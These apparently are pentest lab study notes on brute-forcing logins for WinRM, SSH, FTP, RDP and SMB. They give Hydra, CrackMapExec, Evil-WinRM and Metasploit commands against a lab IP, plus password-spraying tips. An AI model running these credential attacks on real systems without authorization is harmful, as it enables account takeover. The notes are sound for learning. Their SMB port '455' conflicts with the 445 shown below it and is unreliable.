Cracking Network Services
Table of Contents
WinRM
Port 5985&5986
CrackMapExec
install by CrackMapExec
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Evil-WinRM
install:
sudo gem install evil-winrm
usage:
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i 10.129.42.197 -u user -p password
SSH
TCP Port 22
Uses 3 different cryptographic methods
- symmetric encryption
- asymmetric encryption
- hashing
Brute-forcing SSH using hydra
hydra -L user.list -P password.list ssh://10.129.42.197
use -s ti specify the port
FTP
if ftp is present alongside with SSH, it is often much faster attempting to brute force FTP, since unlike SSH, FTP is not rate-limiting
hydra -l kira -P password.list ftp://10.129.42.197
specify a port if ftp is running on a non-default port
hydra -l kira -P password.list ftp://10.129.42.197:2121
RDP
TCP Port 3389
hydra -L user.list -P password.list rdp://10.129.42.197
SMB
Port 455
hydra -L user.list -P password.list smb://10.129.42.197
if error
[ERROR] invalid reply from target smb://10.129.42.197:445/
we have an outdated version of THC-Hydra that cannot handle SMBv3 replies, use metasploit
msfconsole
use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run
or use CrackMapExec
crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
--continue-on-success flag might be useful when spraying single password against multiple user accounts
add --local-auth flag if working with Linux Samba SMB
more on SMB